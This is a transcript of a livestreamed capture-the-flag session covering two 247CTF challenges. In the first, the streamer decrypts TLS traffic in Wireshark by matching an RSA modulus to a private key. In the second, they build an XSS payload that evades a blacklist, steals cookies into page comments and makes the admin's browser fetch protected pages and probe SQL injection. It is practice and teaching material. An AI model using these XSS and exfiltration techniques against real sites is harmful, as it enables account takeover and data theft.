let's take notes. Not my modulus. Oh my god. Stop putting child node. Did it again. Can I just drag this up? There we go. Okay, so we're saying the client IP is 172.17.03. And I'm just saying that right now because we could look at the TCP handshake and see exactly what this is. The client's going to send a SYN first, and then the server will send a SYN ACK, and then the client sends an ACK. I believe that's a three-way handshake, but I can see source address is 03, and it's going from port 39,618 to 8443. So I'm just assuming the lower number port is going to be the server. So that's why 03 I'm going right off the bat as the client and 02 as the server. So There we go. And we're taking a look at this, and it does a bunch of TLS stuff, and then TCP packets. And these are just encrypted within SSL probably. So the challenge is we have to decrypt it. And since it's going through 8443, I'm assuming it is HTTP. And if it was in like elliptical curve, normally that uses Diffie-Hellman, and it wouldn't be decryptable easily with at least just a key. But if it's an RSA encryption, then you generally can decrypt it if you have the private key. So I'm going with the server hello certificate, and I'm going to see if I can extract the server certificate out of this. So let's see, where is this? Probably under TLS, handshake protocol certificate. And let's see. Here we go. Common name 127.0.0.1. So here is the certificate. So we can just extract this certificate. Copy. Where is it? Export. Export packet bytes. So we'll do certificate. Does this give me anything? No. We'll just call this certificate.pub. Shoot. I'm not in tmux. There we go. So let's do file against this to see if we can identify it. It just says data. Let's see. OpenSSL. Let's Google real quick. OpenSSL decode certificate. It's probably going to be PCAP. Decode as X509. This is probably what I want. And form dir in, this is going to be certificate.pub. And we have the SSL certificate. So here is the subject, issuer, serial number. So let's see. There's the serial number. CD keys, ls grep, and is this one of them? No. So that's not it. Oh, the modulus, right here. So, since the challenge is called Not My Modulus, I'm guessing it's based upon this. And the modulus is essentially, I think if you go to ipsec.rocks and probably type in RSA, there'll probably be a better description of what I'm about to do. I just don't feel like saying the machine name because that's how you get monetized delisting, because it has naughty words. But this is essentially what we're doing. The modulus is, I think, P times Q and RSA. And if you know P times Q, if you know these variables, then you may be able to generate a private key, essentially. But since we know the modulus, we can get the modulus for all the keys we have and see what matches up, because only the private key is going to have P and Q, but both of them are going to have what the factor of P times Q is. So modulus is the same in public and private keys. That's all you need to know. Modulus is going to be the same in a public and private key. So instead of just doing dash text, I'm going to do modulus. and we have it here. So what I'm going to do, the pub, we'll do modulus.pub. What do I think about security certificates? I mean, they're good. I mean, the main reason I would go for certificates is to prove you're constantly learning. So if you get 2 certs a year and someone looks at your resume, then they say, well, he may not have a lot of experience right now, but over the past 3 years, he's got 2 certificates every single year, so I know he's growing. So when I hire him now, 2 years from now, I know he's going to be better. And that's generally all employers care about, honestly, is knowing that you can't continuously improve. Because you may not be worth your value on day one, but the longer you stay at a company, the more valuable you are at a company. So that's why, like, if you leave a company after 30 years, you generally can get a larger salary because the company is not paying you market value because you grew since you got hired. It's kind of BS, but that's how it works in my opinion. So if you keep getting certificates, you keep growing in value, and yeah. So let's continue going on the challenge. I think it's open SSL RSA-in keys / something. I just want to see if I can grab the modules out of something. RSA-in, it's key / this. Let's see, typed it wrong. Yep, we got it. So we probably want -no out, and that's going to hide this certificate. So now we can grab the modulus of a key. So let's just grab all of them. So I'll do for I in ls keys, do echo I, and done. And I'm going to copy this command here. So we have that. So we can do echo I, and then we're going to chain this with the command. I can just paste, and we'll put $I here. Okay. Private keys. So what this did was it went through every single key and ran OpenSSL RSA-in keys and then that key and grabbed the modulus. So now if I look at private keys, I think if I do -s, it's going to disable line wrapping, so it's just easier to read. We have the file name and then the modulus. So if I cat modulus.pub and we just grab this, we can grep on private keys. Let's see. Let's do echo, echo, echo. So we have some line breaks before the grep. And this is going to be the private key. So this is the only key that has a matching modulus. So if we go to, I think, File, Edit, Preferences, then Protocols, SSL, or TLS, RSA key list, IP address 172.17.02, port 8443, protocol HTTP, and then the key file is going to be keys, and that 518. So we just added that key for this packet, and Wireshark will automatically decrypt it. And if we look at the post, we can just right click and follow. It's easier to read this. We can see the flag. So that'll be this challenge. So let's do the next one. So we're going to do helicopter next. go to web, helicopter. This application administrators are very aggressive. They will immediately view any page you report. Can you trick them into disclosing data they shouldn't? So let's do start challenge. And then just reading chat real quick. Let's see. So looks like it's using Docker or something to load the challenge. We get to this URL and we have this page. If we go click on admin, it says you are not an administrator on the authorized network. So let's go helicopter, paste, user 1. If we comment, let's just try cross-site scripting. Submit comment, blacklisted content in detector and comments. If we do test, new comment added, just put tags, test 2, new comment added. So it's definitely doing some type of filtering for HTML. Let's see. If we go back to user 1, got stuff. Looking at each user. If we could do report, let's see. Administrators are security conscious when access the site from an internal system on an internal network which doesn't have outbound internet access. So instead of copying everything, let's just take notes at what we should do. No external access, which means no reverse payloads. Comments are deleted. They review reported profiles. Few seconds on each profile. So I'm doing no beef or stuff. Beef is like a framework around cross-site scripting once you do it on a user. It's kind of like Metasploit then. You just hook the browser and you can do a bunch of things. So since they're not on pages a long time, I'm going to skip beef first. They will view a profile. They use Chrome. Whoa. That is weird. Use Chrome. Let's see. Don't like animations. Looking at chat real quick. Pwn challenges. We may do pwn challenges eventually, but probably not today. So, out of curiosity, let's just look. That's using Let's Encrypt. So I'm going to do Wireshark real quick. Based upon the last challenge, they're not my modulus. We're going to run this and see that I'm just curious on something. Bear with me for a minute. We probably have to change the interface. Oh, yeah, we're not doing a VPN. I have too much traffic going on. Not going to worry about this. I was going to do a packet capture of this HTTPS to see it's going in Diffie-Hellman. Oh well. Let's just get back to this challenge. So we have to do some type of cross-site scripting. Let's go to Burp Suite. So right now, I don't know if it's blacklisted in JavaScript or not. So we're doing in Burp Suite. Center repeater. Let's see, blacklisted content directed in comments, but we get additional information. All of these are blacklisted. So let's see. Let's search for comma and put line break. Search for comma and put carriage return. There we go. And we can just remove initial space. There we go. So these are all the blacklisted patterns. So it's all in lowercase. So we can try an uppercase one. So let's un-URL encode this. Click send to make sure it's fine. You should be able to put these brackets in a post just fine, so I don't have to worry about URL encoding them. Capital B, capital /B. Casing is still an issue. So let's get a bunch of payloads and send them through, because you always should have doing some type of recon in the background, and we don't care about being noisy right now. So I'm just going to search for XSS payloads, and we can not go through Burp Suite. Would be great. Let's see. We have a bunch here. Let's do raw. Copy v payloads.txt. Set paste. Paste it in. And we could do wfuzz, but for something like this, I like intruder. If you just search like wfuzz on ipsec.rocks, you could do this without intruder just fine. This is, I think, a paid feature of Burp Suite now. If it's not paid, then its throttle would go slower. But the reason why I'm doing this is because it is quick. And when I do streams, I like going the quick route. So let's see, payload options, strings used. So let's go to root 247CTF, helicopter payloads.txt. And now we can start attack. And I know a lot of people probably want me to use like Zap, but I just honestly like Burp Suite so much more. So going through this, everything that's a 203 worked. So that doesn't look fine. Style on load. If style on load is actually compatible XSS, that will work. But there's a lot of blank lines in this. Let's clean that up. That's annoying. So can we remove all? Clear. Grep dot, let's do wc-l, payloads. Grep dot on payloads, wc-l. Yeah, there was like 90 or 88 blank lines. So just cleaned out the blank lines. And we'll click Start Attack. And then port swigger, XSS, vectors. Let's see. This is a super good page for doing cross-site scripting because you can select events, browsers, and the tag. So I'm going to do the browser as Chrome because the page said, hey, Chrome is vulnerable. Or the admins use Chrome. Come on. There we go. Cherry tree. Oh no, we want this. Go on that side. Terminal, browser, there we go. So now what I'm doing is going through all the tags and we're going to find them that are not blacklisted. So A, blacklisted, ABBR, acronym. Can we copy tags to clipboard? Awesome. This would be a bit better. V, XSS, vectors. Oh, come on. Probably the wrong clipboard. Yep. So let's see. Minimize that for now. Head-1 XSS vectors. Head-1 blacklisted. So we probably just need to remove the carriage returns. So go into blacklisted, %s, remove that. Now if we sort blacklisted WC unique -c, I just want to make sure there's no duplicates in either of these files. Okay, so there's no duplicates in either blacklisted or XSS vectors. So if I cat both of these and then do a sort unique -c grep-v 2, we should get all the XSS vectors that are not blacklisted. So animate, animate motion, animate transform. One of the things said they don't like animations, so we can ignore those. So let's see. We got BG sound. So let's go back here. We're actually cross-site scripting, BG sound. And is there an onload? On focus. So this is saying event handlers that don't require user interaction. Oh, that do. Okay, do not, right here. I was hoping there was onload, but on focus may work. I mean, let's just copy this and see what happens. Get a burp suite. Here's the intruder. We can minimize that for now. Repeater. Send. And it's blacklisted. BG sound. Nope. Oh. It's because if we do B, please subscribe. It's blacklisted because it's matching this. So that sucks. So anything with a B we can ignore. Content. Let's see, can we do content? We can. So let's go over here. Look at content. And we may have one. So if I go back to, this is comment 1, so user 1, reload. Eventually we hit it and oh god. Let's report this profile. let's clear it out. So there's a bunch of stuff from our intruder going at this. Whoops. Grep suite. Submit report. Report 1. There we go. Okay. Nothing here. So let's send this now. If I refresh this page, we see the comment, please subscribe, but I'm not getting the payload. Let's see. On focus, we have it here. It's just not triggering. See, we could do on animation start, but again, the challenge said the administrators don't like animations. So I'm going to move to the next one, since there's quite a few. Image, there's probably I am blacklisted. Let's just get B. Look at all the eyes. Image looks fine. So let's see if image is there. On blur, on focus in. So I'm going to ignore this because I really just want one that has on load. So I wonder if I do all tags. Let's see, where's on load? I don't know why it's not showing things. Let's see. Inputs. Picture. Does picture have on load? Working around blacklist is pretty boring. Style. Image has IMG has that. So if we do IMG, something's going wrong with the site. It should have error. Okay. On loads here for IMG. IMG. On load. See, we got on error here. On load. There's a bunch for IMG. But if we look at image, on activate, on blur, oh, image does. So let's do this. Image on error. I was misreading the site. For some reason, I thought this was... I don't know what happened. I wonder if it was because I was on Chrome. But I could have swore on error and on load were not here the last time I did that. Be something I look at the video for. So let's try this. Let's see. On load. Let's just send this to profile 2. Oh. I is blocked. So that's why it's not working. Was I just ignoring that right pane? I was. So I is blocked. That's why. Let's see. Style has onload. I know that for a fact. So let's go back to this page and go to style. Yeah, style has onload. I'm really going to want to go back to the video because I could have swore I wasn't seeing that before, but could have misread. So style onload, new comment. And we have 1. So finally got some type of JavaScript running. So let's clear this out. And what I'm actually going to do is intercept this request. SVG was on blacklist. Clear. XSS. Okay. So now what we have to do is test to make sure this is working on the administrator. So let's force him to hit the page. So what I'm going to do is we'll do style on load document.write. Please subscribe. So what I want to do right now is test out the document.write function. If I can get please subscribe to the page, then I can put like, well, you'll just see in a second. It's easier demonstrated. So we got please subscribe. So we can clear this out and we can do A to B. And now if I do echo please subscribe to base 64, we can see the comment was added. If I go back to user 1, it's still there. And again, if we clear this, we can see user's profile. And here. And the reason why I did this is if we look at the blacklist, there's a bunch of things we can't really use. So if I'm doing everything in base 64, then I can use anything I want. So we can put just base 64 JavaScript inside of that A to B, and it'll just work. So v test.xss script, and what we want to do is create a form. So let's create a whole new page. Okay. And we need a form. Name is equal to please subscribe. Action is equal to comment to. Method is equal to post. So when you submit this form, it's going to send a post request to comment to. Input ID is equal to please subscribe input. Name is equal to comment. Value is equal to nothing. Slash form. Slash HTML. And before you do any JavaScript, I'll just show you what this is doing. And then we will automate it. So base64 test.xss. Whoops. We need -w0. Whoops. Let's see, we probably should clear this. And then we'll send this new payload. So when we refresh this user, nothing happens. Oh, there's a plus in here. So if we look at this source, we see A2B, and then the plus got URL encoded. So Control U to encode everything, and then we send this. Refresh the page, and we have an HTML form. And if I type something in that and hit enter, it puts a comment on user 2, and I typed test. And if we look at user 2, we have test here. So now what we have to do is automate the submission of this form. So we can clear again. And this is what we're going to do JavaScript. So we can just do script document.getElement by ID is equal to please subscribe input. And yeah, dot value is equal to this is generally where you'd steal a cookie. So we can do B2A document.cookie. And A2B will unbase64, B2A will base64. Generally always base64 things because then you don't have to deal with encoding issues. We can do document.please subscribe .submit. Okay, and before we do this, I'm going to create a cookie on this page. So we can delete these cookies. That's fine. So it'll submit all these cookies. Hopefully none of those are sensitive. So cat test.xss, sure, base64. Paste, Control U. And before we do this, we can look at user 1's page. There's nothing there. User 2, we just have that test. So let's submit our payload. Refresh user 1, directs us here, and nothing happened. So let's look at the source. Let's just go the test.xss. We have to close this. Let's see. Document.please subscribe .submit. That looks good. Okay. Try this again. Copy. We have to clear. Send. /script. Did I not paste it? I did something silly probably. Whenever I get sidetracked when typing, bad things happen. Oh. There we go. Fix that. Let's look at this again. Prevent any typos. Please subscribe. Please subscribe input. Okay. I should really just load up Visual Studio Code and start using that instead of Vim, where it's easier to find mistakes like that. Paste. Send. I may have forgot to clear. Waiting. There we go. What am I missing now? Holy crap. The test.xss. Do I have Visual Studio Code on this? I do. I'm going to load this up real quick. Or if we just rename test.jss to mv test.xss to test.js. I have code highlighting now? I do, but not great. Let's see, this is GoBuster. Open file. Root 247 CTF. Helicopter. Test.js. Okay. Now something's becoming super clear. Why is this all red? So it's that semicolon that did it. I don't think the issue was up here because the script had worked. Let's see. Please subscribe input matches. Please subscribe matches. It's probably something silly like that equals. Let's see. Do this. Clear. Run. So people are saying put quotations around everything. So we'll do that. V test.js. Get element by ID as wrong typed. So let's put quotes around things because that's what chat's spamming. Let's see. ID quotes. I don't think you need quotes in HTML. Especially because this input box had worked when we weren't using JavaScript. And instead of b2a document.cookie, I'm just going to do test. Let's see. Clear. Let's see. Console. Is there anything? Oh, get element by ID is not a function. That would have helped if I did that a lot earlier. I bet that's what someone at least was yelling in chat. Oh, F me. I really hate case sensitivity. Lowercase d there. That was probably a lot of time for a simple lowercase. Paste. Control U. Clear. Wait for this to finish. There we go. Test. There we go. Capital D. It was a lowercase d, not capital. So, I'm sure I'm not the only one to make that mistake and burn that much time. But we did it. User 2. We're now writing test. So, next thing we need is put this as the document.cookie. So what was it? B to A document.cookie like that. Did I do that correct? I believe I did. So let's see. Grab this. Paste. URL encode. Clear. This is going to be clear 1, and we're going to have a clear 2 as well. And that'll be report 2. So now when I send this one, and we go to this page on user 1, and then go to the second page, let's just go back here, user 2. We can see my cookie is here. Echo-n, paste 64-d. And we have the cookie. So what this means is the one use case we haven't really taken count of is if there is no cookie. So we can do value is equal to maybe this works. Let's try this. Paste. Control U. Send. We'll see if it says what I hope it says. Okay. There we go. So the reason why we wanted to do this is if we send it nothing, then we don't really see anything at all. So Like a blank comment doesn't actually trigger anything. So I always wanted to have something get outputted into the comment, just so when someone hits this page, we know. So we have nothing there. So if I go to user 1, okay, so let's put our cookie here, send. And then when we refresh Michael's page, we get it. So now if we try to clear Michael's page, this is going to tell the admin to go to Michael's page and check it out. And we don't get any cookies. So if we go back to admin, we're not on a authorized network, so we have to change our XSS payload. But we finally found out our cross-site scripting is working as long as we use a lowercase d on that one payload. Still kicking myself over that. But we'll have to make the admin hit /admin and then paste the output of that page into a comment. So we can probably Google XML HTTP request XSS exfiltrating data with XML HTTP request, and this is probably kind of what we want to do. So let's copy this, and we'll move test.js to cookiesteal.js and v test.js again. Or let's just copy this to test.js. Paste. And let's see how this works. Onload. Let's see. So the very first thing is I don't know if I like how it's doing this. Let's see. Let's do var get admin is equal to new XML HTTP request. Let's hope I can get all this stupid casing down. Get admin.open, and we want to do a GET request to this URL. So /user0. Okay. And it's doing true. What is that? Let's do XML HTTP request get. What is this? I don't know what this Boolean stating. That's what I'm trying to figure out real quick. Open. Let's see. Method, URL. Probably async. So if it's false, the send method does not return until the response is received. So for the first request, we probably want false, because we don't want to background this GET request. So we can do get admin.send and response is equal to, I'm guessing we have to do var response, maybe, is equal to get admin dot response text. Hopefully that works. Let's see. We can probably do just this and then run it and see if our browser automatically makes that GET request. So let's see. So we did get a GET request here. So that looks fine. And if we do response, oh, we're probably not going to get anything here. Let's do user2. And response is the page. So that should be good. So we can change this back to user 0. The reason why it didn't work for us for user 0, because we can't get the page. So it just returns to that redirect or 404, whatever it was. So now we got to create a post object. So var post user is equal to new XML HTTP request. And we'll do var params is equal to, is it comment? XSS comment is equal to, and then plus encode URI component response. So that should URL encode it. Then after params, we can do post user dot open post this URL. You do user2. And then this can be asynchronous, it doesn't matter. And then post user dot send params. Let's see if this works. That's probably not going to work the first time. We're probably going to have to play around with it a little bit. I think there's something we have to do with content type, but I didn't remember that syntax, so. Let's see, clear 1. New comment added. We go to user 1. We can see it did all those things. If we go to user 2, we didn't get anything, but that may be because of failing to get users/0. Let's just see what is here before we debug. Nothing. So what I'm going to do is we'll switch this to get user 3 and post on user 2, and this will allow us to debug it with our session. So grab this, copy, clear 1 again, paste. Let's go through Burp Suite and open up the console. I think we sent it. So the very first thing I did was clear 1, so probably have to resend this. I saw that error, the 405. That may have been because it was on /user0. So that's why I changed it to user1. At least I believe. So we're doing a post user2, and we're sending all this data. So if we go to user2's profile, we see nothing. So let's try doing what I said first. The XML HTTP request set content type. I think it's this. I know there's a lot of people saying things in chat. I'm pretty sure we have to do the set request header. So if we look back in Burp, let's go back to history. Where is it? Post user2. Method is not allowed. And I think it's this content type text plain. See, if we look at this content type application URL encoded. So method not allowed. I bet if we change this. Oh, wait. Comment, not user. I think we need to do both things, but let's fix that real quick. Test.js, get, this is comment. So there's 2 issues probably going on. This was the first one. And then we'll see if there's the second one that I'm thinking. So let's see. We sent it. Post user2. Let me just clear everything. Clear history. There we go. So if we look at user2 now, did it work? Still don't have anything. Wait. Post. Did I not copy it into the post is going to comment too. I think I was reading chat and did not paste or something. Because it's still doing, yeah. Clear. Paste. Send. clear history, go to user 1, Control Shift R actually. There we go. So now we're seeing we're actually posting to comment 2. What's a response? Comment missing from request. So is that a capital C? Nope. So this is where that second error is coming from, I think. I think the content type is wrong. And I think if we add this, then it'll work. Blacklisted content. So that's much better. So let's see, encode URI components. Let's not worry about that and just do, what is it? B2A. Base64 all this. So this finally should work. Actually, I missed the one thing because we manually edited it. Let's add the content type. Set, what is it? It's not this page, is it? Let's see. This is what we want. Set header request. Post user. Set header request. There we go. So now this one should work. Copy. Let's go to Burp Suite. Clear. Let's close these unused tabs. For good measure, clear again. Paste. Send. Go to user 1. So it posted to user 2. And we have the page. So I think we're finally almost done. So if we grab all this, echo-n, base64-d, we have to do that URI encode components, I think. So all this base has got URL encoded to, all of the pluses did. Sed s space plus. Is that going to make it compliant? Hey, it does. Or somewhat. It birthed eventually, but doesn't matter. So let's go and clear both of these. Clear 1, clear 2, and clear 3. So now we have a fresh slate. Let's do payloads.txt. Nope. vtest.js. Change it to get user 0 and post to user 2. And then cat test.js base64-w0. Copy XSS. Paste. URL encode. Send. Now if we go to user 2, this should be blank. And when we clear ones, that's going to trigger the admin to go to 1, which hopefully triggers all these payloads. Does not look like it worked. One has been cleared. We don't have anything. Send 1. Refresh this. Looks like it does it. This is probably us. I didn't set comment again. I didn't edit comment. V output.html. Paste. V output. Let's look at this. So what I'm guessing is happening is, this is definitely my comment. We're not administrator. People are saying I didn't do something. Let's clear 1, clear 2, clear 3, post. I'm pretty sure I did post after that, but maybe I didn't. Maybe I was talking. So for good measure, send that, and then clear this. If we go to 2, it's blank. So if we go to 1, it's cleared, but I definitely clicked send that time. So it's not that. Let's test something real quick. Let's see. Comment is equal to. So now we should definitely be able to see something. So clear 1, clear 2, clear 3, send. Let's go to 1. If we look at 2, we just see please subscribe. So that's what I wanted to see. So if we clear 1, let's see if please subscribe is sent twice. If it's not, then we wasted a lot of time because this admin user probably doesn't have XML. So let's see. Test.js. Let's try 127.0.0.1. maybe he doesn't know this host name. And if this doesn't work, I guess we can just try /comment and remove the host and see if this works. Copy, paste. So it looks like that's still working. So if we clear one, is it going to happen a third time? It does. So the issue was, I think the admin doesn't have DNS for his own host. So this should work. So let's cat test.js this and copy var params, paste. There we go. And copy this. And then burp. Let's clear everyone. Because people say I don't clear, they should certainly be cleared after that. Send. URL encode. Send. We go to user 1. It's doing the get. User 2. Let's clear user 2, then do it again. Because that's a lot of base 64 to have to scroll through. So user 2 is empty. So let's clear 1 and see if the admin pastes his page now. Hey, we have a page. I think we have finally done it. So copy all this. V output.html.b64. Base 60. We have to replace bases with pluses. Base 64-d output.that. There we go. Finally, Firefox output.html. Administrator. Oh, come on. Let's see. vtest.js get/user/0. We definitely have that. Now I'm getting confused at what I'm supposed to do. Oh. Post, secret admin search. Change request method. Not administrator, so let's update the payload again. So v test.js. Let's copy this to steal page.js. This will be post. That, send. Okay. Copy. Paste. Let's clear one. And we finally got it. Search missing for, oh my god. Less output.html, search. Let's see. ID search, name search. What was that message saying? User 2. What did that say? Search missing from the request. I guess we can do search administrator or search 0. We'll do search equals 0. Search is equal to 0. If we have to end up doing like an SQL injection into this, it's probably annoying. Let's see, send params. Yes, this is how I have it coded. Clear to. Paste. Send. Let's clear to again for good measure. Send. Search missing from request. User 1. Let's send the payload again. So string a post. won't have to set the content type. Let's refresh this and send it through burp. Or we can just look at history. What if I set... Okay, yeah, it's virtual host routing. Okay. So I definitely sent the payload. But maybe it's because of the content type. There we go. Send this. I should have created a Python script to send so I could stop doing this copy and pasting. Okay, let's look at 2. There we go. That's bigger. Echo-n base64-d. That is not it. Let's see. I guess search equals 1. We really have to go through each of these. I'm going to laugh if beef was supposed to be used or something. User 2. Echo-n. Definitely not it. Not it. Search is equal to 1. We did 1. 2. Well, people are saying flag. We can try search is equal to flag and see what happens. Copy. Clear, clear, clear. Paste. Send. Clear 1. Get 2. Probably not found. SQLite error, no flag. So it's probably maybe SQLite injection out of this. V test.js search is equal to, let's see, SQLite dump database. We gotta do injection. Let's just try a %. Let's see. SQLite error % error message. Someone saying a star? We can try a star. Copy. I think the one thing I wish was the admin had a cookie that we could use. Maybe it's on HTTP only. Maybe we should try stealing the admin's cookie. Let's see. I think I cleared it. So I don't think that one's working, unless I just royally screwed up my payload. Let's see. Invalid character. Let's see. What is star URL encoded? Decoder star encode URL %2a. Copy this. Paste. Clear 1, clear 2, clear 3, send 1, clear 1. User 2. I don't think that's the flag. That base 64 looks familiar. That's when you know you've been doing this challenge too long. Let's see. I guess we can try the % thing. I guess if we put this in single quotes, then we can do like that, which is being requested. I'll be surprised if this one works. If this one doesn't work, I'm going to go back to what I was doing and stop reading chat. So let's clear all these. So we got an invalid character somewhere. Probably the %. There we go. Okay. So let's see. User 2. Let's see. Class comment. Let's turn Burp Suite off. SQLite injection cheat sheet. Let's see. Comments, integer, boolean. Don't want to do union. Okay, so I know what I want to do, I think. Let's see. SQLite 3. Create database test.db. Is that going to work? SQLite 3. Create database. It's been so long since I used SQLite. SQLite 3. Create database. No, we have database. Create table. Let's see, databases. That's not it. Let's see, create table if not exists, column 1. Okay, let's copy this. Create test. So what I'm doing now is I just want to test a few things in SQLite. So create table test. Let's do, sure. I probably don't want strings, but really could care less right now. See, I'm going to move chat to a different monitor. You know, I probably have a responder database, so I don't have to create one. Yep, I do. So let's just SQLite 3 on responders database. Dot tables, select stir from poisoned. Select stir from responder. Okay. Dot schema. Okay, awesome. So let's see. Select user from responder. Okay, so we can probably select user from responder where user is equal to re\Luke. Okay, if I do ignore here, re\Kobe. Let's see. Is there a limit? So limit doesn't work how I'm expecting it to. But now we should be able to do where user equals %. Doesn't work. Let's see, r%, r star. Let's see, SQLite, wildcard. Let's see. So wildcard will only work when it's a like. So let's see. Let's just try URL encoding the %. It's %25, I think, for that. Let's double check. Encode as URL, %25. Let's look at this again. Okay. Cat test.js, base64-w0. Copy. Paste. Go to user 2. And we got an error message. So I'm guessing this one is due to it being an equal. So we're probably inside of an equals right now. Would be my guess. So I'm going to try an OR. Let's do search 0 or 1. And I'm kind of curious where this errors out. I'm probably going to need some type of quote in this, but maybe not. Cat test.js base64-w0. Send. Clear 1. CTF2. Whoever did that, this is why we can't do nice things. It's the administrator. I'm going to have to clear these again because what did I do? I did 0 or 1, and then I got like 3 outputs back. I got 0, 1, 2, 3. So I think people are starting to actually do this challenge when I'm doing it, which is going to cause me a headache. So we're probably going to have to respawn this machine and do something to hide a host name. Okay, so this was mine. Echo-n. Let's see. I wonder if it's because I did the space. Let's copy this. And we can search this. Come on, guys. Be kind. I just lost my train of thought. So I'm going to see if I can hide this host name so people can't see it. Stop the challenge. Start the challenge. I'm actually not sure how I'm going to hide the host name. Let's see. Because it's doing virtual host routing. And I think if I do my burp suite to edit that, it's not going to work. Because I don't know if burp suite's proxy will do rewrite rules on these type of things. That's what I'm testing now. So I can't do CNAME on Etsy host because it's virtual host routing. So whatever goes in my host header is where the page goes. And if I put in an Etsy host, then the host header doesn't match. So, yeah. So right now I'm just testing out intercepting server request and rewriting it real quick so you guys can't see the host header. So match request header, place with okay, let's see if this works. Yeah, that's not working. So let's see if I can script this out real quick. So let's do v annoyed.py import requests, and then we'll do what do we call this? Let's see, comment is equal to f, and then we'll do, let's see, payload like that. We actually did a GET request on page 0 and the flag was not there. Let's see. Just copy this whole thing. My brain is fried right now, guys. Sorry. I'm forgetting how to computer very slowly. So let's see. What if I can do like that? I hate dealing with a bunch of quotes. Like, it's one of the things I hate most. It's equal to, please subscribe. Let's see, print, comment. Awesome. So now we should be able to get a payload working. Import requests. Gus, I can show you why I can't do Etsy host. I wish people would stop spamming the same thing, but v Etsy host. So let's say I want to, where's my payload? Where's the host? This guy. So if I ping this, and we create a different host file for this. So Etsy host, put this IP, put please subscribe .ipsec.rocks, and then we try going to this page. Please subscribe .ipsec.rocks. Well, SSL is going to fail. That's a given. We accept SSL. And it just goes to 247 CTF. And the reason is, if we go to proxy, intercept on, and have Firefox go through burp, it's this host head that we have to hit. So if that is 247ctf.com, then it works. So you're redirecting, whatever. But if this isn't that, then it goes to 247ctf. And this will be whatever I do a GET request on. So I can't really just do a host file. Hopefully that makes sense. So let's see, we got the payload. Let's go back to vtest.js, cat it. See, we probably only need the script. So, not on the repeater tab, Gus. That's what when I turn the screen black, that's what I was trying to do, is some type of automatic replacing URLs. But since I couldn't do that, now we have to go this route. So let's try this real quick. Python 3. Okay. So let's see. From base64, import b64 encode, b64 decode. So now we should be able to do b64 encode payload. Bytes like an object and it's a string. Yeah. Okay. Is there a URL encode? Python 3 base64 URL encode. I bet there is. It's probably just b64 URL encode. Let's see. URL underscore safe. So URL safe underscore URL safe underscore. Okay. So let's see. R is equal to request.post. Let's see, the first one we have to do is on 1. And we have to probably go grab the new domain that I did. This one. Okay. Let's see. We gotta do, move this down. Params is equal to, let's see, it's a dictionary, right? Python request post example. Yep, dictionary. And we should call it data. So this will be comment, and then comment. Okay. Data is equal to data. So we'll just see if this works real quick. Print error.response. P is not defined. I just care about the post right now. So let's see. Let's close out of all these tabs. Did not work. We should probably set this through the proxy. Oh wait, request post. It's on user 1. This is comment 1. Okay, so let's do proxies, HTTP 127.0.0.1.80.80, so we can see what error message we're getting. Is it proxy is equal to, I think it's proxies is equal to proxy. I think that's it. Let's see. There we go. Still not sending it. So it's definitely proxies. Intercept is on. I think it made a comment. Let's see. URL should be correct. Python request, send to proxy. I don't know why it's not going to boot. I did something wrong. Proxies. Oh. This is SSL. HTTPS. There we go. So now we can actually see error messages. Maybe. Oh, now we're getting into probably a certificate error. Let's see, Python requests, ignore HTTPS certificate. Let's see. Let's get. I could try it without a proxy, but I mean, I think the proxy is going to be key later on. So request SSL verify false, verify equals false. There we go. So I send this to repeater, comment missing. So we can clearly see what is wrong now. So data is equal to data. Proxies test. We can drop that one. Send this to repeater. New comment added. So we go here. User 1. So let's see. I'm going to clear this real quick. Oh, I'm going through burp and I didn't forward it. Okay. So I think we're going to have to figure out where we screwed up on our payload. So repeater, clear 1. Refresh. Oh. This is still going through the old domain. There we go. So let's fix this with clear 1. That's why it wasn't clearing. So let's see. We send this. New comment added. Refresh this page. And syntax missing something. Let's see. It's got that B in. So this is going to be the Python encoding the string. So we have to convert that into not binary or whatever it is by default. So let's take out this request.post and I can show you exactly what I mean. So if we print comment, or more importantly, let's just print URL safe B64 encode payload. So this will show exactly where that error message came from. We're getting this B in it, and that's just formatting it because of how it is. I think if we do string, maybe .encode or .decode. Let's see. Test is equal to URL safe B64 encode payload, and then print test dot decode. Let's try that. I always forget how to get rid of that. There we go. That's what we want. So we'll move this up here, or actually down there, and we'll say payload is equal to test.decode. Ooh. Yeah. payload, payload. And now all we can do is put payload there. And that probably got rid of it. So checking this. Look at the base64. We no longer have that B there. So we got it working that way. So hopefully we can make this request. It's probably going through proxy, run, repeater, send, new comment added. And there we go. That piece is working. So now all we have to do is make it be able to hit 1. So let's see. Move that there. Okay, now we can clear. Two. R is equal to request dot get report 1. Okay. Now we will get on user 2. And our print r dot, let's see, is it response text? Response.text, like that. And before we do all this, let's make it clear to number 1. Proxy is not defined. We can move that up. And if we go to Burp Suite, we can see everything that's happening. So we're clearing 1. Now we're making the comment. This is going to be the cross-site scripting payload. We're reporting 1 so the admin hits it. Now we're getting 2. And we printed the HTML. So now all we have to do is find the base64. Okay. I may stop the stream now. Like, yeah, that's... May have just killed my mood to do CTFs on live stream. If you didn't get it, people put a bunch of redirects in cross-site scripting on the page. So if I had hit that, bad stuff probably would have happened. Oh. Trying to think what I want to do. Yeah, I'm probably going to end up doing that, but when I open it up in Burp Suite so I can debug it, then I'm going to have issues. So we'll try this, see if I can hide the host name, And if I end up leaking the host name, I'm just going to stop the stream. So, hold on, let me put text. So, let's see. So right now I'm trying to hide the domain from you guys. It's sad that we have to do this type of stuff. Let's see. I think this will work. So, bear with me. Almost done. Why is this erroring out? If people want to ask questions, feel free. I don't answer anything personal because, again, there's trolls out there, so I limit whatever information I can give about myself. But if you have questions about things that are not related to me, happy to answer them. So I'll check chat once I get this anonymized. Right now, I'm not sure exactly why it's not working. Last minute advice for your second OSCP attempt. Always practice recon. Like, you may think you're good at recon, but chances are you're screwing something up there. Like, OSCP is 99% being good at recon, in my opinion. Have I done bug bounties? No. Honestly, I've tried it once or twice, and then it was a pain, like, reporting things and just finding out the duplicates or tracking all that type of stuff. So I stopped doing it. How often am I streaming? During the containment, I've started streaming like once a week, but we'll see how often I do it. I was thinking about doing it more often, but I mean, I'm sure I'll feel better tomorrow, but this has been kind of a demoralizing day of just dealing with trolls with doing these type of things. So I definitely have to start like making sure people can't reach the challenges. And when I started having to worry about that, I'm like, well, why do I not just record it in VOD and keep doing uploads? ELIN security certs, I think they're great. I think any certificate is great. My logic behind doing like any type of certification is it just proves you're constantly improving as a person. So I don't really care if you have like, I'd even advocate getting CEH. A lot of people say don't get CEH, but if it's between CEH and nothing for 6 months, CEH is going to trump nothing. So at least that's how I look at it. I have been a long time, but I'm like so close to solving this challenge, and I really wanted to solve it. I hate leaving things unfinished. Every now 